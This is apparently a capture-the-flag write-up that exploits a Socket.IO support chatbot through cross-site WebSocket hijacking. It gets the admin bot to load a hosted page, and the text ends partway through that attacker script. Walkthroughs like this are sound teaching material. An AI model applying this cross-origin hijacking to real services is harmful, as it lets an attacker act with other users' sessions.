Tags: socket.io csrf web

Rating:

Then, we are presented with a chatbot:

```text
Bot: Welcome to the support chat! An admin will be assisting you.
```

If we look at the source code of the site, we find that it is based on Socket.IO.

Trying to impersonate another user (by changing the room name that is sent to the server) does not work: the server appears to validate our cookie before it lets us join a room.

Now, let's try to enumerate what the chatbot lets us do.

We try to spam some random things:

```text
User: random
```

We also notice that there is a !flag command:

```text
User: !flag
Bot: Only the admin can run that command from our office
```

Since only the admin, and only from the office, may run the command, part of the solution must involve getting the admin's own browser to issue it for us, so the vulnerability will involve some kind of XSS or CSRF.

After trying a few random guesses, we notice that putting a link in causes the admin to try to visit that link:

```text
User: https://example.com
Admin: I am looking into https://example.com give me a moment...
```


Thus, the vulnerability is probably something to do with CSRF.

We can try connecting to the Socket.IO server from a page on another origin, and the connection succeeds: the server does not reject foreign origins, and the browser still attaches our session cookie to the handshake.

So now all we need to do is to host a script that runs !flag:

<script src="https://cdn.jsdelivr.net/npm/socket.io-client@2/dist/socket.io.js"></script>
<script>
let socket = io('http://six.jh2i.com:50022/test');

socket.on('connect', () => {
console.log('connected!');
socket.emit('join', {